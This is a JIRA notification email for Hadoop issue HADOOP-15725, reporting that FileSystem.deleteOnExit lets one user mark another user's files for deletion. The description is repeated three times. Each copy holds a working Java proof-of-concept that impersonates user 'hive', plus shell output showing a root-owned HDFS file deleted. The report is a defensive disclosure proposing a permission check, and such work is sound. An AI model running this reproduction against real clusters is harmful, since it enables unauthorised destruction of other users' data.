[ 
https://issues.apache.org/jira/browse/HADOOP-15725?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Oleksandr Shevchenko updated HADOOP-15725:
------------------------------------------
    Description: 
For now, we able to add any file to FileSystem deleteOnExit list. It leads to 
security problems. Some user (Intruder) can get file system instance which was 
created by another user (Owner) and mark any files to delete even if "Intruder" 
doesn't have any access to this files. Later when "Owner" invoke close method 
(or JVM is shut down since we have ShutdownHook which able to close all file 
systems) marked files will be deleted successfully since deleting was do behalf 
of "Owner" (or behalf of a user who ran a program).

I attached the patch [^deleteOnExitReproduce] which reproduces this possibility 
and also I able to reproduce it on a cluster with both Local and Distributed 
file systems:
{code:java}
public class Main {

public static void main(String[] args) throws Exception {

final FileSystem fs;
 Configuration conf = new Configuration();
 conf.set("fs.default.name", "hdfs://node:9000");
 conf.set("fs.hdfs.impl",
 org.apache.hadoop.hdfs.DistributedFileSystem.class.getName()
 );
 fs = FileSystem.get(conf);
 System.out.println(fs);

Path f = new Path("/user/root/testfile");
 System.out.println(f);

UserGroupInformation hive = UserGroupInformation.createRemoteUser("hive");

hive.doAs((PrivilegedExceptionAction<Boolean>) () -> fs.deleteOnExit(f));
 System.out.println(Arrays.asList(hive.getGroupNames()).toString());

fs.close();
 }
{code}
Result:
{noformat}
root@node:/# hadoop fs -put testfile /user/root
root@node:/# hadoop fs -chown 700 /user/root/testfile
root@node:/# hadoop fs -ls /user/root
Found 1 items
-rw-r--r-- 1 700 supergroup 0 2018-09-06 18:07 /user/root/testfile
root@node:/# java -jar testDeleteOther.jar 
log4j:WARN No appenders could be found for logger 
(org.apache.hadoop.conf.Configuration.deprecation).
log4j:WARN Please initialize the log4j system properly.
log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more 
info.
DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_309539034_1, ugi=root 
(auth:SIMPLE)]]
/user/root/testfile
[]
root@node:/# hadoop fs -ls /user/root
root@node:/# 
{noformat}
We should add a check user permissions before mark a file to delete. 
 Could someone evaluate this? And if no one objects I would like to start 
working on this.
 Thanks a lot for any comments.

  was:
For now, we able to add any file to FileSystem deleteOnExit list. It leads to 
security problems. Some user (Intruder) can get file system instance which was 
created by another user (Owner) and mark any files to delete even if "Intruder" 
doesn't have any access to this files. Later when "Owner" invoke close method 
(or JVM is shut down since we have ShutdownHook which able to close all file 
systems) marked files will be deleted successfully since deleting was do behalf 
of "Owner" (or behalf of a user who ran a program).

I attached the patch [^deleteOnExitReproduce] which reproduces this possibility 
and also I able to reproduce it on a cluster with both Local and Distributed 
file systems:
{code}
public class Main {

public static void main(String[] args) throws Exception {

final FileSystem fs;
 Configuration conf = new Configuration();
 conf.set("fs.default.name", "hdfs://node:9000");
 conf.set("fs.hdfs.impl",
 org.apache.hadoop.hdfs.DistributedFileSystem.class.getName()
 );
 fs = FileSystem.get(conf);
 System.out.println(fs);

Path f = new Path("/user/root/testfile");
 System.out.println(f);

UserGroupInformation hive = UserGroupInformation.createRemoteUser("hive");

hive.doAs((PrivilegedExceptionAction<Boolean>) () -> fs.deleteOnExit(f));
 System.out.println(Arrays.asList(hive.getGroupNames()).toString());

fs.close();
 }
{code}

Result:
{noformat}
root@node:/# hadoop fs -put testfile /user/root
root@node:/# hadoop fs -chown 700 /user/root/testfile
root@node:/# hadoop fs -ls /user/root
Found 1 items
-rw-r--r-- 1 700 supergroup 0 2018-09-06 18:07 /user/root/testfile
root@node:/# java -jar testDeleteOther.jar 
log4j:WARN No appenders could be found for logger 
(org.apache.hadoop.conf.Configuration.deprecation).
log4j:WARN Please initialize the log4j system properly.
log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more 
info.
DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_309539034_1, ugi=root 
(auth:SIMPLE)]]
/user/root/testfile
[]
root@node:/# hadoop fs -ls /user/root
{noformat}

We should add a check user permissions before mark a file to delete. 
Could someone evaluate this? And if no one objects I would like to start 
working on this.
Thanks a lot for any comments.


> FileSystem.deleteOnExit should check user permissions
> -----------------------------------------------------
>
>                 Key: HADOOP-15725
>                 URL: https://issues.apache.org/jira/browse/HADOOP-15725
>             Project: Hadoop Common
>          Issue Type: Bug
>            Reporter: Oleksandr Shevchenko
>            Priority: Major
>              Labels: Security
>         Attachments: deleteOnExitReproduce
>
>
> For now, we able to add any file to FileSystem deleteOnExit list. It leads to 
> security problems. Some user (Intruder) can get file system instance which 
> was created by another user (Owner) and mark any files to delete even if 
> "Intruder" doesn't have any access to this files. Later when "Owner" invoke 
> close method (or JVM is shut down since we have ShutdownHook which able to 
> close all file systems) marked files will be deleted successfully since 
> deleting was do behalf of "Owner" (or behalf of a user who ran a program).
> I attached the patch [^deleteOnExitReproduce] which reproduces this 
> possibility and also I able to reproduce it on a cluster with both Local and 
> Distributed file systems:
> {code:java}
> public class Main {
> public static void main(String[] args) throws Exception {
> final FileSystem fs;
>  Configuration conf = new Configuration();
>  conf.set("fs.default.name", "hdfs://node:9000");
>  conf.set("fs.hdfs.impl",
>  org.apache.hadoop.hdfs.DistributedFileSystem.class.getName()
>  );
>  fs = FileSystem.get(conf);
>  System.out.println(fs);
> Path f = new Path("/user/root/testfile");
>  System.out.println(f);
> UserGroupInformation hive = UserGroupInformation.createRemoteUser("hive");
> hive.doAs((PrivilegedExceptionAction<Boolean>) () -> fs.deleteOnExit(f));
>  System.out.println(Arrays.asList(hive.getGroupNames()).toString());
> fs.close();
>  }
> {code}
> Result:
> {noformat}
> root@node:/# hadoop fs -put testfile /user/root
> root@node:/# hadoop fs -chown 700 /user/root/testfile
> root@node:/# hadoop fs -ls /user/root
> Found 1 items
> -rw-r--r-- 1 700 supergroup 0 2018-09-06 18:07 /user/root/testfile
> root@node:/# java -jar testDeleteOther.jar 
> log4j:WARN No appenders could be found for logger 
> (org.apache.hadoop.conf.Configuration.deprecation).
> log4j:WARN Please initialize the log4j system properly.
> log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more 
> info.
> DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_309539034_1, ugi=root 
> (auth:SIMPLE)]]
> /user/root/testfile
> []
> root@node:/# hadoop fs -ls /user/root
> root@node:/# 
> {noformat}
> We should add a check user permissions before mark a file to delete. 
>  Could someone evaluate this? And if no one objects I would like to start 
> working on this.
>  Thanks a lot for any comments.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

---------------------------------------------------------------------
To unsubscribe, e-mail: common-issues-unsubscr...@hadoop.apache.org
For additional commands, e-mail: common-issues-h...@hadoop.apache.org

Reply via email to